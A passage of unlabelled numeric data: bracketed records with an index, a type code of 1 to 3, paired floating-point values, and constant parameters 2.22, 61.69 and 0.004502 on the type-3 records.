0.2928450952890874, 0, 0, 0], [915, 1, 0.0038197186342054878, 0.1909859317102744, 0, 0, 0], [917, 1, 0.005411268065124442, 0.27056340325622213, 0, 0, 0], [918, 1, 0.012254930618075942, 0.612746530903797, 0, 0, 0], [920, 1, 0.0020371832715762603, 0.10185916357881303, 0, 0, 0], [921, 1, 0.019735212943395024, 0.9867606471697512, 0, 0, 0], [922, 1, 0.05220282133414166, 2.6101410667070835, 0, 0, 0], [923, 1, 0.023236621691416718, 1.161831084570836, 0, 0, 0], [925, 1, 0.008276057040778557, 0.4138028520389279, 0, 0, 0], [931, 1, 0.03455253814525047, 1.7276269072625237, 0, 0, 0], [935, 1, 0.007352958370845565, 0.36764791854227824, 0, 0, 0], [936, 1, 0.016615776058793875, 0.8307888029396938, 0, 0, 0], [937, 1, 0.00477464829275686, 0.238732414637843, 0, 0, 0], [939, 1, 1.5915494309189534e-05, 0.0007957747154594768, 0, 0, 0], [940, 1, 0.009421972631040205, 0.47109863155201026, 0, 0, 0], [944, 1, 0.004042535554534142, 0.2021267777267071, 0, 0, 0], [950, 1, 0.005092958178940651, 0.25464790894703254, 0, 0, 0], [952, 1, 0.005045211696013082, 0.2522605848006541, 0, 0, 0], [958, 1, 0.010615634704229418, 0.530781735211471, 0, 0, 0], [959, 1, 0.007241549910681238, 0.3620774955340619, 0, 0, 0], [960, 1, 0.004217605991935227, 0.21088029959676136, 0, 0, 0], [963, 1, 0.2785211504108168, 13.926057520540843, 0, 0, 0], [965, 1, 0.11204507993669433, 5.602253996834716, 0, 0, 0], [966, 1, 0.021008452488130186, 1.0504226244065094, 0, 0, 0], [967, 1, 0.01193662073189215, 0.5968310365946076, 0, 0, 0], [969, 1, 0.018111832523857688, 0.9055916261928845, 0, 0, 0], [971, 1, 0.0031830988618379067, 0.15915494309189535, 0, 0, 0], [973, 1, 0.4287634166895661, 21.438170834478306, 0, 0, 0], [976, 1, 0.008562535938343968, 0.4281267969171984, 0, 0, 0], [978, 1, 0.0007321127382227185, 0.03660563691113593, 0, 0, 0], [982, 1, 0.0015756339366097638, 0.07878169683048819, 0, 0, 0], [983, 1, 0.01400563499208679, 0.7002817496043395, 0, 0, 0], [984, 1, 0.14801409707546268, 7.400704853773133, 0, 0, 0], [985, 1, 0.0035014087480216977, 0.17507043740108488, 0, 0, 0], [986, 1, 0.0017825353626292277, 0.08912676813146138, 0, 0, 0], [987, 1, 0.02618098813861678, 1.3090494069308392, 0, 0, 0], [988, 1, 0.0008116902097686662, 0.04058451048843331, 0, 0, 0], [993, 1, 0.06238873769202297, 3.119436884601149, 0, 0, 0], [994, 1, 0.010504226244065093, 0.5252113122032547, 0, 0, 0], [995, 1, 0.0006684507609859605, 0.033422538049298026, 0, 0, 0], [997, 1, 0.005984225860255264, 0.2992112930127632, 0, 0, 0], [999, 1, 0.004965634224467135, 0.24828171122335674, 0, 0, 0], [1000, 1, 0.015597184423005743, 0.7798592211502873, 0, 0, 0], [1002, 1, 0.0031512678732195276, 0.15756339366097638, 0, 0, 0], [1003, 1, 0.2864788975654116, 14.32394487827058, 0, 0, 0], [1007, 1, 0.007416620348082323, 0.37083101740411617, 0, 0, 0], [1008, 1, 0.015597184423005743, 0.7798592211502873, 0, 0, 0], [1010, 1, 0.238732414637843, 11.93662073189215, 0, 0, 0], [1011, 1, 0.005952394871636886, 0.2976197435818443, 0, 0, 0], [1012, 1, 0.9024085273310466, 45.12042636655233, 0, 0, 0], [1014, 1, 0.238732414637843, 11.93662073189215, 0, 0, 0], [1026, 1, 0.20868396138209316, 10.434198069104658, 0, 0, 0], [1027, 3, 0.002994821465372534, 0.1497410732686267, 2.22, 61.69, 0.004502], [1028, 2, 0.025464790894703257, 1.273239544735163, 0, 0, 0], [1029, 2, 0.003819718634205488, 0.19098593171027442, 0, 0, 0], [1030, 2, 0.06480789282701978, 3.2403946413509894, 0, 0, 0], [1031, 2, 0.0921316134570364, 4.60658067285182, 0, 0, 0], [1032, 2, 0.007673590729774597, 0.3836795364887299, 0, 0, 0], [1033, 2, 0.002744950837961712, 0.1372475418980856, 0, 0, 0], [1034, 2, 0.004556924395643113, 0.22784621978215563, 0, 0, 0], [1035, 3, 0.002509529326393682, 0.1254764663196841, 2.22, 61.69, 0.004502], [1036, 2, 0.003764470578065157, 0.18822352890325786, 0, 0, 0], [1037, 2, 0.0035900341474145565, 0.17950170737072782, 0, 0, 0], [1038, 2, 0.0032473554733364013, 0.16236777366682006, 0, 0, 0], [1039, 2, 0.003988178520451466, 0.19940892602257332, 0, 0, 0], [1040, 3, 1.8387886712561912e-06, 9.193943356280956e-05, 2.22, 61.69, 0.004502], [1041, 2, 0.006988730451215285, 0.3494365225607643, 0, 0, 0], [1042, 2, 0.0015696795615764453, 0.07848397807882226, 0, 0, 0], [1043, 3, 0.00020515858260199948, 0.010257929130099975, 2.22, 61.69, 0.004502], [1044, 3, 0.0016082869745307122, 0.0804143487265356, 2.22, 61.69, 0.004502], [1045, 2, 0.00332225832772122, 0.16611291638606102, 0, 0, 0], [1046, 2, 0.00679827557108513, 0.33991377855425653, 0, 0, 0], [1047, 3, 0.0006860534596866231, 0.03430267298433116, 2.22, 61.69, 0.004502], [1048, 2, 0.004527782582320866, 0.22638912911604336, 0, 0, 0], [1049, 2, 0.011394709633258235, 0.5697354816629118, 0, 0, 0], [1050, 2, 0.002531696065873242, 0.12658480329366212, 0, 0, 0], [1051, 2, 0.012436473699524754, 0.6218236849762377, 0, 0, 0], [1052, 3, 0.001315809692296204, 0.06579048461481019, 2.22, 61.69, 0.004502], [1053, 3, 0.001042024786453249, 0.05210123932266245, 2.22, 61.69, 0.004502], [1054, 2, 0.017434200209443074, 0.8717100104721537, 0, 0, 0], [1055, 3, 8.722483936366302e-05, 0.004361241968183152, 2.22, 61.69, 0.004502], [1056, 2, 0.017705632510076133, 0.8852816255038067, 0, 0, 0], [1057, 2, 0.01751601940539467, 0.8758009702697337, 0, 0, 0], [1058, 2, 0.032508653207068715, 1.6254326603534357, 0, 0, 0], [1059, 2, 0.012954004231269266, 0.6477002115634634, 0, 0, 0], [1060, 3, 0.00032582643945562476, 0.01629132197278124, 2.22, 61.69, 0.004502], [1061, 2, 0.005790269664720296, 0.2895134832360148, 0, 0, 0], [1062, 3, 8.761711074687232e-05, 0.004380855537343616, 2.22, 61.69, 0.004502], [1063, 3, 0.00026079307896696653, 0.013039653948348329, 2.22, 61.69, 0.004502], [1064, 2, 0.006987939172062223, 0.34939695860311115, 0, 0, 0], [1065, 2, 0.01333196372577174, 0.666598186288587, 0, 0, 0], [1066, 2, 0.007262961694920903, 0.36314808474604515, 0, 0, 0], [1067, 3, 0.002078788013715776, 0.1039394006857888, 2.22, 61.69, 0.004502], [1068, 3, 0.0003188842576981683, 0.015944212884908417, 2.22, 61.69, 0.004502], [1069, 3, 0.00020313001706596343, 0.010156500853298172, 2.22, 61.69, 0.004502], [1070, 3, 5.020379247175116e-05, 0.0025101896235875582, 2.22, 61.69, 0.004502], [1071, 3, 0.0002755733400308117, 0.013778667001540588, 2.22, 61.69, 0.004502], [1072, 2, 0.007168748144119091, 0.3584374072059546, 0, 0, 0], [1073, 2, 0.004954025493475761, 0.24770127467378808, 0, 0, 0], [1074, 2, 0.009778033156939965, 0.48890165784699824, 0, 0, 0], [1075, 3, 0.0010048055180333312, 0.05024027590166657, 2.22, 61.69, 0.004502], [1076, 3, 7.142742988420316e-05, 0.0035713714942101587, 2.22, 61.69, 0.004502], [1077, 3, 0.001153611870631108, 0.05768059353155539, 2.22, 61.69, 0.004502], [1078, 3, 0.0012092516903803715, 0.060462584519018585, 2.22, 61.69, 0.004502], [1079, 2, 0.004604543003215469, 0.23022715016077344, 0, 0, 0], [1080, 2, 0.005988792040675494, 0.29943960203377473, 0, 0, 0], [1081, 2, 0.0181221012501699, 0.9061050625084951, 0, 0, 0], [1082, 2, 0.024454977356584733, 1.2227488678292369, 0, 0, 0], [1083, 2, 0.025588702826457446, 1.2794351413228724, 0, 0, 0], [1084, 2, 0.023193908222176627, 1.1596954111088316, 0, 0, 0], [1085, 2, 0.007239283505967098, 0.3619641752983549, 0, 0, 0], [1086, 2, 0.01146870315696564, 0.573435157848282, 0, 0, 0], [1087, 2, 0.007427186304799236, 0.3713593152399618, 0, 0, 0], [1088, 3, 0.0023416461987310717, 0.11708230993655358, 2.22, 61.69, 0.004502], [1089, 2, 0.01731897345769215, 0.8659486728846075, 0, 0, 0], [1090, 2, 0.005674885746854652, 0.2837442873427326, 0, 0, 0], [1091, 3, 0.0024191268707775496, 0.12095634353887749, 2.22, 61.69, 0.004502], [1092, 2, 0.0028158699782723385, 0.14079349891361692, 0, 0, 0], [1093, 2, 0.009906140914748767, 0.49530704573743833, 0, 0, 0], [1094, 3, 0.00023930778294026586, 0.011965389147013294, 2.22, 61.69, 0.004502], [1095, 3, 1.3047613994501091e-05, 0.0006523806997250545, 2.22, 61.69, 0.004502], [1096, 2, 0.005379826679377905, 0.2689913339688953, 0, 0, 0], [1097, 3, 0.0002929164939619051, 0.014645824698095257, 2.22, 61.69, 0.004502], [1098, 2, 0.004521623727146264, 0.22608118635731317, 0, 0, 0], [1099, 2, 0.018521637260932335, 0.9260818630466169, 0, 0, 0], [1100, 3, 7.681471862631617e-07, 3.8407359313158084e-05, 2.22, 61.69, 0.004502], [1101, 2, 0.003316737250445921, 0.16583686252229604, 0, 0, 0], [1102, 2, 0.012536982030247754, 0.6268491015123878, 0, 0, 0], [1103, 2, 0.009372578695412134, 0.4686289347706067, 0, 0, 0], [1104, 3, 1.3172819714966009e-05, 0.0006586409857483004, 2.22, 61.69, 0.004502], [1105, 3, 0.0001386935566767763, 0.006934677833838815, 2.22, 61.69, 0.004502], [1106, 3, 0.00014577275883068604, 0.0072886379415343025, 2.22, 61.69, 0.004502], [1107, 2, 0.004852418696402547, 0.24262093482012728, 0, 0, 0], [1108, 2, 0.01733819208621475, 0.8669096043107376, 0, 0, 0], [1109, 3, 4.9542410867097304e-05, 0.002477120543354865, 2.22, 61.69, 0.004502], [1110, 3, 0.00010533237807450261, 0.00526661890372513, 2.22, 61.69, 0.004502], [1111, 2, 0.004660803798843093, 0.23304018994215464, 0, 0, 0], [1112, 2, 0.004426690383932842, 0.2213345191966421, 0, 0, 0], [1113, 3, 0.00022513170529279912, 0.011256585264639957, 2.22, 61.69, 0.004502], [1114, 3, 0.0008560555102861403, 0.042802775514307015, 2.22, 61.69, 0.004502], [1115, 2, 0.0032197222090973076, 0.16098611045486538, 0, 0, 0], [1116, 3, 0.002075453185310181, 0.10377265926550905, 2.22, 61.69, 0.004502], [1117, 2, 0.005780032679669937, 0.2890016339834969, 0, 0, 0], [1118, 3, 0.0005554515385863421, 0.027772576929317106, 2.22, 61.69, 0.004502], [1119, 3, 0.0027536366373517632, 0.13768183186758817, 2.22, 61.69, 0.004502], [1120, 3, 0.0001538074296570127, 0.007690371482850636, 2.22, 61.69, 0.004502], [1121, 3, 3.4414977793908876e-05, 0.0017207488896954439, 2.22, 61.69, 0.004502], [1122, 3, 9.313004041299959e-05, 0.00465650202064998, 2.22, 61.69, 0.004502], [1123, 3, 9.32225252447514e-05, 0.00466112626223757, 2.22, 61.69, 0.004502], [1124, 3, 8.201464578534214e-05, 0.004100732289267108, 2.22, 61.69, 0.004502], [1125, 3, 0.0016436821796102436, 0.08218410898051219, 2.22, 61.69, 0.004502], [1126, 3, 0.0018560581327172175, 0.09280290663586088, 2.22, 61.69, 0.004502], [1127, 2, 0.006703391093283916, 0.3351695546641958, 0, 0, 0], [1128, 3, 0.0001948941120002845, 0.009744705600014225, 2.22, 61.69, 0.004502], [1129, 3, 0.0003016780123772693, 0.015083900618863466, 2.22, 61.69, 0.004502], [1130, 3, 6.530151955301432e-05, 0.003265075977650716, 2.22, 61.69, 0.004502], [1131, 3, 0.00018443373362804407, 0.009221686681402204, 2.22, 61.69, 0.004502], [1132, 3, 2.2886271300209156e-05, 0.0011443135650104578, 2.22, 61.69, 0.004502], [1133, 3, 4.5810964480308454e-05, 0.002290548224015423, 2.22, 61.69, 0.004502], [1134, 3, 3.236913111220881e-05, 0.0016184565556104404, 2.22, 61.69, 0.004502], [1135, 3, 0.0005167964323996007, 0.025839821619980042, 2.22, 61.69, 0.004502], [1136, 3, 2.5636662405410735e-05, 0.0012818331202705368, 2.22, 61.69, 0.004502], [1137, 3, 0.00020209010123087894, 0.010104505061543947, 2.22, 61.69, 0.004502], [1138, 3, 7.98498118498449e-05, 0.003992490592492246, 2.22, 61.69, 0.004502], [1139, 3, 0.0012619566606414858, 0.0630978330320743, 2.22, 61.69, 0.004502], [1140, 3, 0.0018073289497007397, 0.09036644748503699, 2.22, 61.69, 0.004502], [1141, 2, 0.0076053500901520025, 0.38026750450760016, 0, 0, 0], [1142, 3, 7.73959943559724e-05, 0.00386979971779862, 2.22, 61.69, 0.004502], [1143, 3, 0.0016067873237582107, 0.08033936618791054, 2.22, 61.69, 0.004502], [1144, 2, 0.00334399697192306, 0.16719984859615303, 0, 0, 0], [1145, 2, 0.011197481443497569, 0.5598740721748785, 0, 0, 0], [1146, 3, 5.4833151376821656e-05, 0.002741657568841083, 2.22, 61.69, 0.004502], [1147, 3, 0.002909588342312674, 0.14547941711563372, 2.22, 61.69, 0.004502], [1148, 3, 0.0011233492673683868, 0.05616746336841934, 2.22, 61.69, 0.004502], [1149, 3, 0.0005447417794635118, 0.02723708897317559, 2.22, 61.69, 0.004502], [1150, 3, 0.0002306193019977063, 0.011530965099885314, 2.22, 61.69, 0.004502], [1151, 3, 0.0008299047575760064, 0.04149523787880033, 2.22, 61.69, 0.004502], [1152, 3, 7.417749437366368e-06, 0.0003708874718683184, 2.22, 61.69, 0.004502], [1153, 3, 4.37920348658174e-06, 0.000218960174329087, 2.22, 61.69, 0.004502], [1154, 3, 1.0225677287248534e-05, 0.0005112838643624266, 2.22, 61.69, 0.004502], [1155, 3, 3.879887736397654e-05, 0.001939943868198827, 2.22, 61.69, 0.004502], [1156, 3, 0.0010200134924871187, 0.05100067462435595, 2.22, 61.69, 0.004502], [1157, 3, 0.00027719360593007886, 0.013859680296503944, 2.22, 61.69, 0.004502], [1158, 3, 6.640198284893194e-05, 0.003320099142446597, 2.22, 61.69, 0.004502], [1159, 3, 0.0008593149079194712, 0.04296574539597356, 2.22, 61.69, 0.004502], [1160, 2, 0.011245247160806403, 0.5622623580403202, 0, 0, 0], [1161, 3, 0.0009050732909810454, 0.045253664549052275, 2.22, 61.69, 0.004502], [1162, 2, 0.01579637398582555, 0.7898186992912775, 0, 0, 0], [1163, 2, 0.009872070652825584, 0.49360353264127926, 0, 0, 0], [1164, 2, 0.012318464360294098, 0.6159232180147048, 0, 0, 0], [1165, 2, 0.0020205393695453904, 0.10102696847726952, 0, 0, 0], [1166, 2, 0.004018374611923933, 0.20091873059619667, 0, 0, 0], [1167, 3, 0.00032173361521807824, 0.016086680760903912, 2.22, 61.69, 0.004502], [1168, 3, 8.56746647323757e-05, 0.004283733236618785, 2.22, 61.69, 0.004502], [1169, 3, 0.00017327803824915608, 0.008663901912457804, 2.22, 61.69, 0.004502], [1170, 3, 1.6933420442211857e-05, 0.000846671022110593, 2.22, 61.69, 0.004502], [1171, 3, 0.0004436730981049702, 0.022183654905248512, 2.22, 61.69, 0.004502], [1172, 3, 0.00011248640972075772, 0.005624320486037886, 2.22, 61.69, 0.004502], [1173, 2, 0.009463655972725032, 0.4731827986362517, 0, 0, 0], [1174, 3, 8.021928882473966e-05, 0.004010964441236983, 2.22, 61.69, 0.004502], [1175, 3, 5.445989361520192e-05, 0.002722994680760096, 2.22, 61.69, 0.004502], [1176, 3, 1.4783581244732665e-05, 0.0007391790622366333, 2.22, 61.69, 0.004502], [1177, 3, 0.0017745146198091144, 0.08872573099045572, 2.22, 61.69, 0.004502], [1178, 3, 0.00020168108435446162, 0.010084054217723081, 2.22, 61.69, 0.004502], [1179, 3, 8.316119408334767e-05, 0.004158059704167384, 2.22, 61.69, 0.004502], [1180, 3, 4.3834108298364086e-05, 0.002191705414918204, 2.22, 61.69, 0.004502], [1181, 2, 0.00545834972439398, 0.272917486219699, 0, 0, 0], [1182, 2, 0.006322880792722177, 0.3161440396361089, 0, 0, 0], [1183, 3, 0.0024333246840658566, 0.12166623420329284, 2.22, 61.69, 0.004502], [1184, 3, 0.00026859021396164037, 0.013429510698082018, 2.22, 61.69, 0.004502], [1185, 3, 0.0007221796423758263, 0.036108982118791315, 2.22, 61.69, 0.004502], [1186, 3, 0.0024774929167619207, 0.12387464583809603, 2.22, 61.69, 0.004502], [1187, 3, 0.0006248151564821885, 0.031240757824109424, 2.22, 61.69, 0.004502], [1188, 2, 0.011354261826154068, 0.5677130913077034, 0, 0, 0], [1189, 3, 0.001053073976573113, 0.05265369882865566, 2.22, 61.69, 0.004502], [1190, 2, 0.01403960969000889, 0.7019804845004446, 0, 0, 0], [1191, 2, 0.004652379906159672, 0.23261899530798363, 0, 0, 0], [1192, 3, 0.0010742429830456737, 0.053712149152283686, 2.22, 61.69, 0.004502], [1193, 3, 0.00015278576957249078, 0.007639288478624539, 2.22, 61.69, 0.004502], [1194, 3, 0.0005720688022791215, 0.028603440113956075, 2.22, 61.69, 0.004502], [1195, 3, 1.2882573563174789e-05, 0.0006441286781587394, 2.22, 61.69, 0.004502], [1196, 2, 0.006972574796029537, 0.34862873980147685, 0, 0, 0], [1197, 2, 0.0036281001371613985, 0.18140500685806996, 0, 0, 0], [1198, 3, 0.002534966273924786, 0.12674831369623932, 2.22, 61.69, 0.004502], [1199, 2, 0.012822920004466005, 0.6411460002233003, 0, 0, 0], [1200, 2, 0.0035658606694853635, 0.1782930334742682, 0, 0, 0], [1201, 3, 0.0016021597716395785, 0.08010798858197893, 2.22, 61.69, 0.004502], [1202, 3, 0.0031762475555186724, 0.15881237777593363, 2.22, 61.69, 0.004502], [1203, 2, 0.011626157559117188, 0.5813078779558594, 0, 0, 0], [1204, 3, 0.0024402145134664213, 0.12201072567332108, 2.22, 61.69, 0.004502], [1205, 3, 2.3029972080634594e-05, 0.00115149860403173, 2.22, 61.69, 0.004502], [1206, 3, 0.00023209667024933257, 0.011604833512466628, 2.22, 61.69, 0.004502], [1207, 3, 0.00022762038155293296, 0.011381019077646649, 2.22, 61.69, 0.004502], [1208, 3, 0.00011579290110993377, 0.005789645055496689, 2.22, 61.69, 0.004502], [1209, 3, 3.251449672478224e-05, 0.001625724836239112, 2.22, 61.69, 0.004502], [1210, 3, 0.00027625851144802855, 0.01381292557240143, 2.22, 61.69, 0.004502], [1211, 3, 0.0011462484513341364, 0.057312422566706815, 2.22, 61.69, 0.004502], [1212, 2, 0.005804182676892941, 0.290209133844647, 0, 0, 0], [1213, 2, 0.0036505499187602444, 0.18252749593801224, 0, 0, 0], [1214, 3, 0.00019221528542890247, 0.009610764271445124, 2.22, 61.69, 0.004502], [1215, 3, 9.209770739968864e-05, 0.0046048853699844315, 2.22, 61.69, 0.004502], [1216, 2, 0.002638729966123342, 0.13193649830616713, 0, 0, 0], [1217, 3, 0.0013619759755742445, 0.06809879877871222, 2.22, 61.69, 0.004502], [1218, 3, 3.674056304691878e-05, 0.001837028152345939, 2.22, 61.69, 0.004502], [1219, 3, 0.0007855588922898729, 0.03927794461449365, 2.22, 61.69, 0.004502], [1220, 3, 0.001947919590347708, 0.0973959795173854, 2.22, 61.69, 0.004502], [1221, 2, 0.029287049456110742, 1.464352472805537, 0, 0, 0], [1222, 2, 0.013436354905899806, 0.6718177452949904, 0, 0, 0], [1223, 3, 0.00024230393037435297, 0.01211519651871765, 2.22, 61.69, 0.004502], [1224, 2, 0.007338999413823278, 0.3669499706911639, 0, 0, 0], [1225, 3, 0.0010794988287226176, 0.05397494143613089, 2.22, 61.69, 0.004502], [1226, 3, 0.00014157941880145813, 0.007078970940072908, 2.22, 61.69, 0.004502], [1227, 3, 0.0011129900410750567, 0.05564950205375283, 2.22, 61.69, 0.004502], [1228, 3, 0.00019182406693803712, 0.009591203346901856, 2.22, 61.69, 0.004502], [1229, 2, 0.00326230849376, 0.16311542468800003, 0, 0, 0], [1230, 3, 6.62705445324572e-05, 0.0033135272266228595, 2.22, 61.69, 0.004502], [1231, 3, 0.0011358653840235018, 0.05679326920117509, 2.22, 61.69, 0.004502], [1232, 2, 0.0026550976361663123, 0.13275488180831563, 0, 0, 0], [1233, 2, 0.03662908231521014, 1.831454115760507, 0, 0, 0], [1235, 3, 0.0005753349157073776, 0.028766745785368877, 2.22, 61.69, 0.004502], [1236, 2, 0.005234608320670995, 0.26173041603354974, 0, 0, 0], [1237, 3, 0.0009298092078685558, 0.04649046039342779, 2.22, 61.69, 0.004502], [1238, 2, 0.008560442553329063, 0.4280221276664532, 0, 0, 0], [1239, 3, 0.0001443666373276477, 0.007218331866382386, 2.22, 61.69, 0.004502], [1240, 2, 0.011596133964263648, 0.5798066982131824, 0, 0, 0], [1241, 2, 0.023980214175600253, 1.1990107087800126, 0, 0, 0], [1242, 3, 0.0010379593592581304, 0.05189796796290652, 2.22, 61.69, 0.004502], [1243, 2, 0.004197429655255099, 0.209871482762755, 0, 0, 0], [1244, 2, 0.020592901244747865, 1.0296450622373932, 0, 0, 0], [1245, 3, 0.0003215553455506432, 0.01607776727753216, 2.22, 61.69, 0.004502], [1246, 2, 0.003636870278584459, 0.18184351392922293, 0, 0, 0], [1247, 3, 0.0013899571448864774, 0.06949785724432388, 2.22, 61.69, 0.004502], [1248, 2, 0.005854245631350222, 0.2927122815675111, 0, 0, 0], [1249, 2, 0.004846915908139961, 0.24234579540699805, 0, 0, 0], [1250, 3, 0.0019627317861894665, 0.09813658930947333, 2.22, 61.69, 0.004502], [1251, 3, 0.0014899668826355728, 0.07449834413177864, 2.22, 61.69, 0.004502], [1252, 3, 0.0009100362000223709, 0.045501810001118546, 2.22, 61.69, 0.004502], [1253, 2, 0.002749879491219364, 0.13749397456096818, 0, 0, 0], [1254, 2, 0.0047836076213814945, 0.23918038106907474, 0, 0, 0], [1255, 3, 0.00021069393821362856, 0.010534696910681427, 2.22, 61.69, 0.004502], [1256, 3, 0.0008370189352371742, 0.041850946761858715, 2.22, 61.69, 0.004502], [1257, 2, 0.004720516132100809, 0.23602580660504047, 0, 0, 0], [1258, 2, 0.014991588973313675, 0.7495794486656838, 0, 0, 0], [1259, 2, 0.005620491743017691, 0.2810245871508846, 0, 0, 0], [1260, 3, 0.0008100529334879771, 0.04050264667439886, 2.22, 61.69, 0.004502], [1261, 2, 0.007499458700620714, 0.37497293503103574, 0, 0, 0], [1262, 3, 3.3365758929065435e-05, 0.0016682879464532717, 2.22, 61.69, 0.004502], [1263, 3, 2.243579925674327e-05, 0.0011217899628371635, 2.22, 61.69, 0.004502], [1264, 2, 0.005222533303161435, 0.2611266651580718, 0, 0, 0], [1265, 3, 0.0004236530619172327, 0.021182653095861634, 2.22, 61.69, 0.004502], [1266, 2, 0.007621029313600565, 0.38105146568002835, 0, 0, 0], [1267, 3, 0.002512674942558201, 0.12563374712791006, 2.22, 61.69, 0.004502], [1268, 3, 9.234155512786517e-05, 0.004617077756393259, 2.22, 61.69, 0.004502], [1269, 3, 0.000142725431664042, 0.007136271583202101, 2.22, 61.69, 0.004502], [1270, 3, 0.001175156457667214, 0.05875782288336069, 2.22, 61.69, 0.004502], [1271, 3, 0.0018912310491878092, 0.09456155245939046, 2.22, 61.69, 0.004502], [1272, 3, 4.697474785341043e-05, 0.0023487373926705216, 2.22, 61.69, 0.004502], [1273, 3, 0.0001365411277597595, 0.006827056387987976, 2.22, 61.69, 0.004502], [1274, 2, 0.0033801727100761705, 0.1690086355038085, 0, 0, 0], [1275, 2, 0.006307329492962109, 0.3153664746481055, 0, 0, 0], [1276, 3, 0.001633288835647369, 0.08166444178236844, 2.22, 61.69, 0.004502], [1277, 2, 0.004149818930997597, 0.2074909465498799, 0, 0, 0], [1278, 2, 0.010850406134369231, 0.5425203067184615, 0, 0, 0], [1279, 3, 1.1293950864713334e-07, 5.646975432356666e-06, 2.22, 61.69, 0.004502], [1280, 3, 1.639311697890922e-05, 0.000819655848945461, 2.22, 61.69, 0.004502], [1281, 3, 6.369322054808536e-05, 0.0031846610274042677, 2.22, 61.69, 0.004502], [1282, 3, 0.00015834095135338206, 0.007917047567669106, 2.22, 61.69, 0.004502], [1283, 2, 0.08261824948992594, 4.130912474496298, 0, 0, 0], [1284, 3, 0.001039150374283347, 0.05195751871416735, 2.22, 61.69, 0.004502], [1285, 3, 7.454863939218863e-05, 0.0037274319696094307, 2.22, 61.69, 0.004502], [1286, 3, 0.0011377796471657795, 0.05688898235828898, 2.22, 61.69, 0.004502], [1287, 2, 0.005104900268482232, 0.2552450134241116, 0, 0, 0], [1288, 2, 0.00944760882155904, 0.472380441077952, 0, 0, 0], [1289, 2, 0.0059425042550468165, 0.29712521275234083, 0, 0, 0], [1290, 3, 0.00023732228159721092, 0.011866114079860548, 2.22, 61.69, 0.004502], [1291, 2, 0.0062575490505418305, 0.31287745252709154, 0, 0, 0], [1292, 3, 0.002653563231501149, 0.13267816157505744, 2.22, 61.69, 0.004502], [1293, 3, 7.314489260849259e-05, 0.003657244630424629, 2.22, 61.69, 0.004502], [1294, 3, 0.00016475245775443277, 0.00823762288772164, 2.22, 61.69, 0.004502], [1295, 3, 0.00018133556388758186, 0.009066778194379094, 2.22, 61.69, 0.004502], [1296, 3, 0.0006935624958471066, 0.03467812479235534, 2.22, 61.69, 0.004502], [1297, 2, 0.005184767378968868, 0.2592383689484434, 0, 0, 0], [1298, 3, 0.00010239383289242722, 0.005119691644621362, 2.22, 61.69, 0.004502], [1299, 3, 6.22297976183495e-05, 0.003111489880917476, 2.22, 61.69, 0.004502], [1300, 3, 0.001511593201166196, 0.07557966005830981, 2.22, 61.69, 0.004502], [1301, 2, 0.0038746782543149596, 0.193733912715748, 0, 0, 0], [1302, 3, 0.0003104985267932093, 0.015524926339660468, 2.22, 61.69, 0.004502], [1303, 3, 0.00027600750632746427, 0.013800375316373212, 2.22, 61.69, 0.004502], [1304, 3, 0.000610793340517708, 0.030539667025885397, 2.22, 61.69, 0.004502], [1305, 3, 2.9075695387122924e-07, 1.4537847693561463e-05, 2.22, 61.69, 0.004502], [1306, 3, 0.00011631130798083146, 0.005815565399041573, 2.22, 61.69, 0.004502], [1307, 3, 1.9031130574577255e-05, 0.0009515565287288628, 2.22, 61.69, 0.004502], [1308, 3, 9.985154128830475e-05, 0.004992577064415238, 2.22, 61.69, 0.004502], [1309, 3, 0.0002132096944766602, 0.01066048472383301, 2.22, 61.69, 0.004502], [1310, 3, 0.00010478060392325507, 0.005239030196162754, 2.22, 61.69, 0.004502], [1311, 3, 0.00044854578150260965, 0.022427289075130485, 2.22, 61.69, 0.004502], [1312, 2, 0.016696303623916272, 0.8348151811958137, 0, 0, 0], [1313, 3, 0.0019631283227609974, 0.09815641613804986, 2.22, 61.69, 0.004502], [1314, 3, 0.0007641975650906521, 0.038209878254532606, 2.22, 61.69, 0.004502], [1315, 3, 0.0005015944131679134, 0.02507972065839567, 2.22, 61.69, 0.004502], [1316, 3, 7.001768328213614e-05, 0.0035008841641068073, 2.22, 61.69, 0.004502], [1317, 3, 0.0015252502049763412, 0.07626251024881707, 2.22, 61.69, 0.004502], [1318, 3, 0.00012454395408676328, 0.0062271977043381645, 2.22, 61.69, 0.004502], [1319, 3, 0.001127343871228203, 0.05636719356141015, 2.22, 61.69, 0.004502], [1320, 3, 0.0011081256312511583, 0.05540628156255791, 2.22, 61.69, 0.004502], [1321, 3, 6.259640436089282e-06, 0.0003129820218044641, 2.22, 61.69, 0.004502], [1322, 3, 5.919056262068799e-05, 0.0029595281310344, 2.22, 61.69, 0.004502], [1323, 2, 0.009386219155982768, 0.4693109577991384, 0, 0, 0], [1324, 3, 0.0008316328586631403, 0.04158164293315702, 2.22, 61.69, 0.004502], [1325, 2, 0.0028531725030758143, 0.1426586251537907, 0, 0, 0], [1326, 2, 0.0036242041289439157, 0.1812102064471958, 0, 0, 0], [1327, 2, 0.0032338308031027566, 0.16169154015513784, 0, 0, 0], [1328, 3, 0.0010226241895011407, 0.05113120947505704, 2.22, 61.69, 0.004502], [1329, 2, 0.013921309839652627, 0.6960654919826315, 0, 0, 0], [1330, 3, 0.0011724110784692178, 0.05862055392346089, 2.22, 61.69, 0.004502], [1331, 3, 1.841349064624893e-05, 0.0009206745323124464, 2.22, 61.69, 0.004502], [1332, 3, 0.0010806486059076362, 0.054032430295381816, 2.22, 61.69, 0.004502], [1333, 3, 0.0029061854047842247, 0.14530927023921122, 2.22, 61.69, 0.004502], [1334, 3, 3.353421156815477e-05, 0.0016767105784077387, 2.22, 61.69, 0.004502], [1335, 3, 0.00012134658768220359, 0.006067329384110179, 2.22, 61.69, 0.004502], [1336, 3, 0.0013057607158439676, 0.06528803579219838, 2.22, 61.69, 0.004502], [1337, 2, 0.007180669434434556, 0.3590334717217278, 0, 0, 0], [1338, 3, 5.300015004820578e-05, 0.0026500075024102894, 2.22, 61.69, 0.004502], [1339, 3, 0.0006421253879349708, 0.032106269396748544, 2.22, 61.69, 0.004502], [1340, 2, 0.004236744655616901, 0.2118372327808451, 0, 0, 0], [1341, 2, 0.013083384367936227, 0.6541692183968114, 0, 0, 0], [1342, 3, 2.3013868553740477e-05, 0.001150693427687024, 2.22, 61.69, 0.004502], [1343, 3, 2.880690321869792e-05, 0.001440345160934896, 2.22, 61.69, 0.004502], [1344, 3, 1.4391232894862565e-05, 0.0007195616447431282, 2.22, 61.69, 0.004502], [1345, 3, 0.00013803927118084336, 0.006901963559042169, 2.22, 61.69, 0.004502], [1346, 2, 0.013669449762218379, 0.6834724881109189, 0, 0, 0], [1347, 2, 0.021216267244666295, 1.060813362233315, 0, 0, 0], 